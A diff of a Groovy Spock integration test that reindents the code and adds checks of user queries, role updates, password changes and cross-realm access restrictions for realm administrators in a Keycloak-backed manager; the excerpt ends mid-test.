-    static KeycloakTestSetup keycloakTestSetup
-    @Shared
-    static int resetPasswordRequests = 0
+  @Shared
+  static UserResource adminUserResource
+  @Shared
+  static UserResource regularUserMasterResource
+  @Shared
+  static UserResource regularUserBuildingResource
+  @Shared
+  static UserResource adminUserBuildingResource
+  @Shared
+  static KeycloakTestSetup keycloakTestSetup
+  @Shared
+  static int resetPasswordRequests = 0
 
-    def setupSpec() {
-        def container = startContainer(defaultConfig(), defaultServices())
-        keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def identityProvider = Spy(container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider)
-        container.getService(ManagerIdentityService.class).identityProvider = identityProvider
-        identityProvider.requestPasswordReset(_ as String, _ as String)  >> {
-            realm, userId ->
-                resetPasswordRequests++
-        }
+  def setupSpec() {
+    def container = startContainer(defaultConfig(), defaultServices())
+    keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def identityProvider = Spy(container.getService(ManagerIdentityService.class).identityProvider as ManagerKeycloakIdentityProvider)
+    container.getService(ManagerIdentityService.class).identityProvider = identityProvider
+    identityProvider.requestPasswordReset(_ as String, _ as String) >> { realm, userId ->
+      resetPasswordRequests++
+    }
 
-        def accessToken = authenticate(
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        def regularMasterAccessToken = authenticate(
+    def regularMasterAccessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             "testuser1",
             "testuser1"
-        )
+            )
 
-        def regularBuildingAccessToken = authenticate(
+    def regularBuildingAccessToken = authenticate(
             container,
             keycloakTestSetup.realmBuilding.name,
             KEYCLOAK_CLIENT_ID,
             "testuser3",
             "testuser3"
-        )
+            )
 
-        def adminBuildingRoles = identityProvider.getUserClientRoles(
+    def adminBuildingRoles = identityProvider.getUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser4Id,
             KEYCLOAK_CLIENT_ID
-        )
-        identityProvider.updateUserClientRoles(
+            )
+    identityProvider.updateUserClientRoles(
             keycloakTestSetup.realmBuilding.name,
             keycloakTestSetup.testuser4Id,
             KEYCLOAK_CLIENT_ID,
             ((adminBuildingRoles as List) + ClientRole.READ_ADMIN.value).unique() as String[]
-        )
+            )
 
-        def adminBuildingAccessToken = authenticate(
+    def adminBuildingAccessToken = authenticate(
             container,
             keycloakTestSetup.realmBuilding.name,
             KEYCLOAK_CLIENT_ID,
             "testuser4",
             "testuser4"
-        )
+            )
 
-        adminUserResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(UserResource.class)
-        regularUserMasterResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, regularMasterAccessToken).proxy(UserResource.class)
-        regularUserBuildingResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, regularBuildingAccessToken).proxy(UserResource.class)
-        adminUserBuildingResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, adminBuildingAccessToken).proxy(UserResource.class)
+    adminUserResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(UserResource.class)
+    regularUserMasterResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, regularMasterAccessToken).proxy(UserResource.class)
+    regularUserBuildingResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, regularBuildingAccessToken).proxy(UserResource.class)
+    adminUserBuildingResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, adminBuildingAccessToken).proxy(UserResource.class)
+  }
+
+  def "User queries"() {
+
+    when: "a request is made for all users by a super user"
+    def users = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+
+    then: "all users should be returned including system users"
+    users.size() == 4
+    users.find {it.isSystemAccount() && it.username == Constants.MANAGER_CLIENT_ID} != null
+    users.find {it.username == MASTER_REALM_ADMIN_USER} != null
+    users.find {it.id == keycloakTestSetup.testuser1Id} != null
+
+    when: "a request is made for all users in the same realm by a regular user"
+    users = regularUserMasterResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+
+    then: "only non system users of the users realm should be returned"
+    users.size() == 3
+    users.find {it.username == MASTER_REALM_ADMIN_USER} != null
+    users.find {it.id == keycloakTestSetup.testuser1Id} != null
+
+    when: "a request is made for all users in a different realm by a regular user"
+    users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+
+    then: "only non system users of the users realm should be returned"
+    users.size() == 6
+    users.count {it.isSystemAccount() && it.username == Constants.MANAGER_CLIENT_ID} == 0
+    users.find {it.id == keycloakTestSetup.testuser2Id} != null
+    users.find {it.id == keycloakTestSetup.testuser3Id} != null
+    users.find {it.id == keycloakTestSetup.testuser4Id} != null
+    users.find {it.id == keycloakTestSetup.buildingUserId} != null
+    users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id} != null
+    users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id} != null
+
+    when: "a request is made for all users ordered by username"
+    users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+
+    then: "only non system users of the users realm should be returned in username order"
+    users.size() == 6
+    users[0].username == keycloakTestSetup.buildingUser.username
+    users[1].username == keycloakTestSetup.serviceUser.username
+    users[2].username == keycloakTestSetup.serviceUser2.username
+    users[3].username == keycloakTestSetup.testuser2.username
+    users[4].username == keycloakTestSetup.testuser3.username
+    users[5].username == keycloakTestSetup.testuser4.username
+
+    when: "a request is made for subset of users ordered by username descending (with wrong realm which will be automatically changed to the users realm)"
+    users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, true)).limit(2))
+
+    then: "the correct users should be returned"
+    users.size() == 2
+    users[0].username == keycloakTestSetup.testuser4.username
+    users[1].username == keycloakTestSetup.testuser3.username
+
+    when: "a request is made for another subset of users ordered by username descending (with wrong realm which will be automatically changed to the users realm)"
+    users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, true)).limit(2).offset(3))
+
+    then: "the correct users should be returned"
+    users.size() == 2
+    users[0].username == keycloakTestSetup.serviceUser2.username
+    users[1].username == keycloakTestSetup.serviceUser.username
+
+    when: "a request is made for only service users (users with a secret)"
+    users = adminUserResource.query(null, new UserQuery().serviceUsers(true).realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name)))
+
+    then: "only service users of the requested realm should be returned"
+    users.size() == 2
+    users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id} != null
+    users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id} != null
+    users.find {
+      it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id
+    }.secret != null
+    users.find {
+      it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id
+    }.secret != null
+
+    when: "a request is made for only restricted users"
+    users = regularUserBuildingResource.query(null,
+            new UserQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .realmRoles(new StringPredicate(Constants.RESTRICTED_USER_REALM_ROLE))
+            .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+
+    then: "only restricted users of this realm should be returned"
+    users.size() == 3
+    users[0].username == keycloakTestSetup.buildingUser.username
+    users[1].username == keycloakTestSetup.serviceUser2.username
+    users[2].username == keycloakTestSetup.testuser3.username
+
+    when: "a request is made for non restricted users"
+    users = regularUserBuildingResource.query(null,
+            new UserQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .realmRoles(new StringPredicate(Constants.RESTRICTED_USER_REALM_ROLE).negate(true))
+            .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+
+    then: "only non restricted users of this realm should be returned"
+    users.size() == 3
+    users[0].username == keycloakTestSetup.serviceUser.username
+    users[1].username == keycloakTestSetup.testuser2.username
+    users[2].username == keycloakTestSetup.testuser4.username
+
+    when: "a request is made based on user attributes"
+    users = regularUserBuildingResource.query(null,
+            new UserQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .attributes(
+                    new UserQuery.AttributeValuePredicate(true, new StringPredicate(User.SYSTEM_ACCOUNT_ATTRIBUTE)),
+                    new UserQuery.AttributeValuePredicate(true, new StringPredicate(EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE), new StringPredicate("true"))
+                    ).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+
+    then: "only matching users of this realm should be returned"
+    users.size() == 5
+    users[0].username == keycloakTestSetup.buildingUser.username
+    users[1].username == keycloakTestSetup.serviceUser.username
+    users[2].username == keycloakTestSetup.serviceUser2.username
+    users[3].username == keycloakTestSetup.testuser2.username
+    users[4].username == keycloakTestSetup.testuser4.username
+
+    when: "a request is made for users with the write:alarms client role"
+    users = regularUserBuildingResource.query(null,
+            new UserQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .clientRoles(new StringPredicate(Constants.WRITE_ALARMS_ROLE))
+            .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+
+    then: "only users of this realm with the write:alarms client role should be returned"
+    users.size() == 3
+    users[0].username == keycloakTestSetup.buildingUser.username
+    users[1].username == keycloakTestSetup.testuser3.username
+    users[2].username == keycloakTestSetup.testuser4.username
+  }
+
+  def "Get and update roles"() {
+
+    when: "a request is made for the roles in the building realm by the admin user"
+    def roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+
+    then: "the standard client roles should have been returned"
+    roles.size() == ClientRole.values().length
+    def readComposite = roles.find {it.name == ClientRole.READ.value}
+    readComposite != null
+    readComposite.description == ClientRole.READ.description
+    readComposite.compositeRoleIds.length == ClientRole.READ.composites.length
+    assert readComposite.compositeRoleIds.every {roleId ->
+      String roleName = roles.find {it.id == roleId}.name
+      return ClientRole.READ.composites.any {it.value == roleName}
     }
 
-    def "User queries"() {
+    def readAssets = roles.find{ it.name == ClientRole.READ_ASSETS.value}
+    readAssets != null
+    readAssets.description == ClientRole.READ_ASSETS.description
+    readAssets.compositeRoleIds == null
 
-        when: "a request is made for all users by a super user"
-        def users = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    when: "a request is made for the roles in the smart building realm by a regular user"
+    regularUserBuildingResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
 
-        then: "all users should be returned including system users"
-        users.size() == 4
-        users.find {it.isSystemAccount() && it.username == Constants.MANAGER_CLIENT_ID} != null
-        users.find {it.username == MASTER_REALM_ADMIN_USER} != null
-        users.find {it.id == keycloakTestSetup.testuser1Id} != null
+    then: "a not allowed exception should be thrown"
+    thrown(ForbiddenException.class)
 
-        when: "a request is made for all users in the same realm by a regular user"
-        users = regularUserMasterResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    when: "a realm admin tries to read client roles from the master realm"
+    adminUserBuildingResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
 
-        then: "only non system users of the users realm should be returned"
-        users.size() == 3
-        users.find {it.username == MASTER_REALM_ADMIN_USER} != null
-        users.find {it.id == keycloakTestSetup.testuser1Id} != null
+    then: "the cross-realm read should be rejected"
+    thrown(NotAllowedException)
 
-        when: "a request is made for all users in a different realm by a regular user"
-        users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    when: "a new composite role is created by the admin user"
+    List<Role> updatedRoles = new ArrayList<>(Arrays.asList(roles))
+    updatedRoles.add(new Role(
+                    null,
+                    "test",
+                    true, // Value is ignored on update
+                    false, // Value is ignored on update
+                    [
+                      roles.find {it.name == ClientRole.READ_LOGS.value}.id,
+                      roles.find {it.name == ClientRole.READ_MAP.value}.id
+                    ] as String[]
+                    ).setDescription("This is a test"))
+    adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, updatedRoles as Role[])
+    roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    def testRole = roles.find {it.name == "test"}
 
-        then: "only non system users of the users realm should be returned"
-        users.size() == 6
-        users.count {it.isSystemAccount() && it.username == Constants.MANAGER_CLIENT_ID} == 0
-        users.find {it.id == keycloakTestSetup.testuser2Id} != null
-        users.find {it.id == keycloakTestSetup.testuser3Id} != null
-        users.find {it.id == keycloakTestSetup.testuser4Id} != null
-        users.find {it.id == keycloakTestSetup.buildingUserId} != null
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id} != null
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id} != null
+    then: "the new composite role should have been saved"
+    testRole != null
+    testRole.description == "This is a test"
+    testRole.compositeRoleIds.length == 2
+    testRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_LOGS.value}.id)
+    testRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_MAP.value}.id)
 
-        when: "a request is made for all users ordered by username"
-        users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
+    when: "an existing composite role is updated by the admin user"
+    def writeRole = roles.find {it.name == ClientRole.WRITE.value}
+    writeRole.compositeRoleIds = [roles.find {it.name == ClientRole.READ_ASSETS.value}.id]
+    adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, roles)
+    roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    writeRole = roles.find {it.name == ClientRole.WRITE.value}
 
-        then: "only non system users of the users realm should be returned in username order"
-        users.size() == 6
-        users[0].username == keycloakTestSetup.buildingUser.username
-        users[1].username == keycloakTestSetup.serviceUser.username
-        users[2].username == keycloakTestSetup.serviceUser2.username
-        users[3].username == keycloakTestSetup.testuser2.username
-        users[4].username == keycloakTestSetup.testuser3.username
-        users[5].username == keycloakTestSetup.testuser4.username
+    then: "the write role should have been updated"
+    writeRole != null
+    writeRole.compositeRoleIds.length == 1
+    writeRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_ASSETS.value}.id)
+  }
 
-        when: "a request is made for subset of users ordered by username descending (with wrong realm which will be automatically changed to the users realm)"
-        users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, true)).limit(2))
+  def "Get and update users"() {
+    when: "a user is retrieved"
+    def user = adminUserResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
 
-        then: "the correct users should be returned"
-        users.size() == 2
-        users[0].username == keycloakTestSetup.testuser4.username
-        users[1].username == keycloakTestSetup.testuser3.username
+    then: "all data should be available"
+    user != null
+    user.attributes != null
+    user.attributes.size() == 1
+    user.attributes.get(0).getName() == EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE
+    user.attributes.get(0).getValue() == "true"
+    user.id == keycloakTestSetup.testuser3Id
+    user.realm == keycloakTestSetup.realmBuilding.name
+    user.username == keycloakTestSetup.testuser3.username
 
-        when: "a request is made for another subset of users ordered by username descending (with wrong realm which will be automatically changed to the users realm)"
-        users = regularUserBuildingResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, true)).limit(2).offset(3))
+    when: "a new attribute is added to the user"
+    user.setAttribute("test", "testvalue")
+    user = adminUserResource.update(null, keycloakTestSetup.realmBuilding.name, user)
 
-        then: "the correct users should be returned"
-        users.size() == 2
-        users[0].username == keycloakTestSetup.serviceUser2.username
-        users[1].username == keycloakTestSetup.serviceUser.username
-
-        when: "a request is made for only service users (users with a secret)"
-        users = adminUserResource.query(null, new UserQuery().serviceUsers(true).realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name)))
-
-        then: "only service users of the requested realm should be returned"
-        users.size() == 2
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id} != null
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id} != null
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser.id}.secret != null
-        users.find {it.isServiceAccount() && it.id == keycloakTestSetup.serviceUser2.id}.secret != null
-
-        when: "a request is made for only restricted users"
-        users = regularUserBuildingResource.query(null,
-                new UserQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .realmRoles(new StringPredicate(Constants.RESTRICTED_USER_REALM_ROLE))
-                        .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
-
-        then: "only restricted users of this realm should be returned"
-        users.size() == 3
-        users[0].username == keycloakTestSetup.buildingUser.username
-        users[1].username == keycloakTestSetup.serviceUser2.username
-        users[2].username == keycloakTestSetup.testuser3.username
-
-        when: "a request is made for non restricted users"
-        users = regularUserBuildingResource.query(null,
-                new UserQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .realmRoles(new StringPredicate(Constants.RESTRICTED_USER_REALM_ROLE).negate(true))
-                        .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
-
-        then: "only non restricted users of this realm should be returned"
-        users.size() == 3
-        users[0].username == keycloakTestSetup.serviceUser.username
-        users[1].username == keycloakTestSetup.testuser2.username
-        users[2].username == keycloakTestSetup.testuser4.username
-
-        when: "a request is made based on user attributes"
-        users = regularUserBuildingResource.query(null,
-                new UserQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .attributes(
-                            new UserQuery.AttributeValuePredicate(true, new StringPredicate(User.SYSTEM_ACCOUNT_ATTRIBUTE)),
-                            new UserQuery.AttributeValuePredicate(true, new StringPredicate(EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE), new StringPredicate("true"))
-                ).orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
-
-        then: "only matching users of this realm should be returned"
-        users.size() == 5
-        users[0].username == keycloakTestSetup.buildingUser.username
-        users[1].username == keycloakTestSetup.serviceUser.username
-        users[2].username == keycloakTestSetup.serviceUser2.username
-        users[3].username == keycloakTestSetup.testuser2.username
-        users[4].username == keycloakTestSetup.testuser4.username
-
-        when: "a request is made for users with the write:alarms client role"
-        users = regularUserBuildingResource.query(null,
-                new UserQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                        .clientRoles(new StringPredicate(Constants.WRITE_ALARMS_ROLE))
-                        .orderBy(new UserQuery.OrderBy(UserQuery.OrderBy.Property.USERNAME, false)))
-
-        then: "only users of this realm with the write:alarms client role should be returned"
-        users.size() == 3
-        users[0].username == keycloakTestSetup.buildingUser.username
-        users[1].username == keycloakTestSetup.testuser3.username
-        users[2].username == keycloakTestSetup.testuser4.username
+    then: "the update should have succeeded"
+    user.attributes.size() == 2
+    user.attributes.any {
+      it.name == EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE && it.value == "true"
     }
+    user.attributes.any {it.name == "test" && it.value == "testvalue"}
 
-    def "Get and update roles"() {
+    when: "a user with ${Constants.WRITE_USER_ROLE} role updates their own user information"
+    keycloakTestSetup.testuser3.setAttribute("selfUpdate", "success")
+    def updatedUser = regularUserBuildingResource.updateCurrent(null, keycloakTestSetup.testuser3)
 
-        when: "a request is made for the roles in the building realm by the admin user"
-        def roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    then: "the update should succeed"
+    updatedUser != null
+    updatedUser.attributes.any { it.name == "selfUpdate" && it.value == "success" }
 
-        then: "the standard client roles should have been returned"
-        roles.size() == ClientRole.values().length
-        def readComposite = roles.find {it.name == ClientRole.READ.value}
-        readComposite != null
-        readComposite.description == ClientRole.READ.description
-        readComposite.compositeRoleIds.length == ClientRole.READ.composites.length
-        assert readComposite.compositeRoleIds.every {roleId ->
-            String roleName = roles.find {it.id == roleId}.name
-            return ClientRole.READ.composites.any {it.value == roleName}
-        }
+    when: "the user tries to update another user's information"
+    keycloakTestSetup.testuser2.setAttribute("unauthorizedUpdate", "shouldFail")
+    regularUserBuildingResource.updateCurrent(null, keycloakTestSetup.testuser2)
 
-        def readAssets = roles.find{ it.name == ClientRole.READ_ASSETS.value}
-        readAssets != null
-        readAssets.description == ClientRole.READ_ASSETS.description
-        readAssets.compositeRoleIds == null
+    then: "an exception should be thrown"
+    thrown(ForbiddenException)
 
-        when: "a request is made for the roles in the smart building realm by a regular user"
-        regularUserBuildingResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    when: "an admin user tries to update another user's information"
+    keycloakTestSetup.testuser3.setAttribute("authorizedUpdate", "shouldNotFail")
+    updatedUser = adminUserResource.update(null, keycloakTestSetup.testuser3.realm, keycloakTestSetup.testuser3)
 
-        then: "a not allowed exception should be thrown"
-        thrown(ForbiddenException.class)
+    then: "the update should succeed"
+    updatedUser.attributes.any { it.name == "authorizedUpdate" && it.value == "shouldNotFail" }
 
-        when: "a realm admin tries to read client roles from the master realm"
-        adminUserBuildingResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
+    when: "the admin verifies the user's attributes were updated"
+    def verifiedUser = adminUserResource.get(null, keycloakTestSetup.testuser3.realm, keycloakTestSetup.testuser3.id)
 
-        then: "the cross-realm read should be rejected"
-        thrown(NotAllowedException)
+    then: "the self-update attribute should be present"
+    verifiedUser.attributes.any { it.name == "selfUpdate" && it.value == "success" }
 
-        when: "a new composite role is created by the admin user"
-        List<Role> updatedRoles = new ArrayList<>(Arrays.asList(roles))
-        updatedRoles.add(new Role(
-            null,
-            "test",
-            true, // Value is ignored on update
-            false, // Value is ignored on update
-            [
-                roles.find {it.name == ClientRole.READ_LOGS.value}.id,
-                roles.find {it.name == ClientRole.READ_MAP.value}.id
-            ] as String[]
-        ).setDescription("This is a test"))
-        adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, updatedRoles as Role[])
-        roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
-        def testRole = roles.find {it.name == "test"}
+    and: "the authorized update attribute should be present"
+    verifiedUser.attributes.any { it.name == "authorizedUpdate" && it.value == "shouldNotFail" }
 
-        then: "the new composite role should have been saved"
-        testRole != null
-        testRole.description == "This is a test"
-        testRole.compositeRoleIds.length == 2
-        testRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_LOGS.value}.id)
-        testRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_MAP.value}.id)
+    when: "a regular user tries to update another user's password"
+    regularUserBuildingResource.updatePassword(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, new Credential("newPassword", false))
 
-        when: "an existing composite role is updated by the admin user"
-        def writeRole = roles.find {it.name == ClientRole.WRITE.value}
-        writeRole.compositeRoleIds = [
-            roles.find {it.name == ClientRole.READ_ASSETS.value}.id
-        ]
-        adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, roles)
-        roles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
-        writeRole = roles.find {it.name == ClientRole.WRITE.value}
+    then: "an exception should be thrown"
+    thrown(ForbiddenException)
 
-        then: "the write role should have been updated"
-        writeRole != null
-        writeRole.compositeRoleIds.length == 1
-        writeRole.compositeRoleIds.contains(roles.find {it.name == ClientRole.READ_ASSETS.value}.id)
-    }
+    when: "an admin user tries to update another user's password"
+    adminUserResource.updatePassword(null, keycloakTestSetup.testuser2.realm, keycloakTestSetup.testuser2Id, new Credential("newPassword", false))
 
-    def "Get and update users"() {
-        when: "a user is retrieved"
-        def user = adminUserResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
-
-        then: "all data should be available"
-        user != null
-        user.attributes != null
-        user.attributes.size() == 1
-        user.attributes.get(0).getName() == EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE
-        user.attributes.get(0).getValue() == "true"
-        user.id == keycloakTestSetup.testuser3Id
-        user.realm == keycloakTestSetup.realmBuilding.name
-        user.username == keycloakTestSetup.testuser3.username
-
-        when: "a new attribute is added to the user"
-        user.setAttribute("test", "testvalue")
-        user = adminUserResource.update(null, keycloakTestSetup.realmBuilding.name, user)
-
-        then: "the update should have succeeded"
-        user.attributes.size() == 2
-        user.attributes.any {it.name == EMAIL_NOTIFICATIONS_DISABLED_ATTRIBUTE && it.value == "true"}
-        user.attributes.any {it.name == "test" && it.value == "testvalue"}
-
-        when: "a user with ${Constants.WRITE_USER_ROLE} role updates their own user information"
-        keycloakTestSetup.testuser3.setAttribute("selfUpdate", "success")
-        def updatedUser = regularUserBuildingResource.updateCurrent(null, keycloakTestSetup.testuser3)
-
-        then: "the update should succeed"
-        updatedUser != null
-        updatedUser.attributes.any { it.name == "selfUpdate" && it.value == "success" }
-
-        when: "the user tries to update another user's information"
-        keycloakTestSetup.testuser2.setAttribute("unauthorizedUpdate", "shouldFail")
-        regularUserBuildingResource.updateCurrent(null, keycloakTestSetup.testuser2)
-
-        then: "an exception should be thrown"
-        thrown(ForbiddenException)
-
-        when: "an admin user tries to update another user's information"
-        keycloakTestSetup.testuser3.setAttribute("authorizedUpdate", "shouldNotFail")
-        updatedUser = adminUserResource.update(null, keycloakTestSetup.testuser3.realm, keycloakTestSetup.testuser3)
-
-        then: "the update should succeed"
-        updatedUser.attributes.any { it.name == "authorizedUpdate" && it.value == "shouldNotFail" }
-
-        when: "the admin verifies the user's attributes were updated"
-        def verifiedUser = adminUserResource.get(null, keycloakTestSetup.testuser3.realm, keycloakTestSetup.testuser3.id)
-
-        then: "the self-update attribute should be present"
-        verifiedUser.attributes.any { it.name == "selfUpdate" && it.value == "success" }
-
-        and: "the authorized update attribute should be present"
-        verifiedUser.attributes.any { it.name == "authorizedUpdate" && it.value == "shouldNotFail" }
-
-        when: "a regular user tries to update another user's password"
-        regularUserBuildingResource.updatePassword(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, new Credential("newPassword", false))
-
-        then: "an exception should be thrown"
-        thrown(ForbiddenException)
-
-        when: "an admin user tries to update another user's password"
-        adminUserResource.updatePassword(null, keycloakTestSetup.testuser2.realm, keycloakTestSetup.testuser2Id, new Credential("newPassword", false))
-
-        then: "the password should have been updated"
-        def testUser2BuildingAccessToken = authenticate(
+    then: "the password should have been updated"
+    def testUser2BuildingAccessToken = authenticate(
             container,
             keycloakTestSetup.realmBuilding.name,
             KEYCLOAK_CLIENT_ID,
             "testuser2",
             "newPassword"
-        )
-        testUser2BuildingAccessToken != null
+            )
+    testUser2BuildingAccessToken != null
+  }
+
+  def "Get user requires realm administration rights"() {
+    when: "a realm admin retrieves a user from their own realm"
+    def sameRealmUser = adminUserBuildingResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+
+    then: "the user should be returned"
+    sameRealmUser != null
+    sameRealmUser.id == keycloakTestSetup.testuser2Id
+    sameRealmUser.realm == keycloakTestSetup.realmBuilding.name
+
+    when: "a superuser retrieves a user across realms"
+    def crossRealmUser = adminUserResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+
+    then: "the cross-realm read should succeed for the superuser"
+    crossRealmUser != null
+    crossRealmUser.id == keycloakTestSetup.testuser2Id
+
+    when: "a realm admin tries to retrieve a user from the master realm"
+    adminUserBuildingResource.get(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
+
+    then: "the cross-realm read should be rejected"
+    thrown(NotAllowedException)
+
+    when: "a realm admin uses their own realm path with a user ID from another realm"
+    adminUserBuildingResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1Id)
+
+    then: "the mismatched user realm should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Get user client roles requires realm administration rights"() {
+    when: "a realm admin retrieves client roles for a user in their own realm"
+    def sameRealmRoles = adminUserBuildingResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
+
+    then: "the roles should be returned"
+    sameRealmRoles as Set == [
+      ClientRole.WRITE_USER.value,
+      ClientRole.READ_MAP.value,
+      ClientRole.READ_ASSETS.value
+    ] as Set
+
+    when: "a superuser retrieves client roles across realms"
+    def crossRealmRoles = adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
+
+    then: "the cross-realm read should succeed for the superuser"
+    crossRealmRoles as Set == sameRealmRoles as Set
+
+    when: "a realm admin tries to retrieve client roles for a user in the master realm"
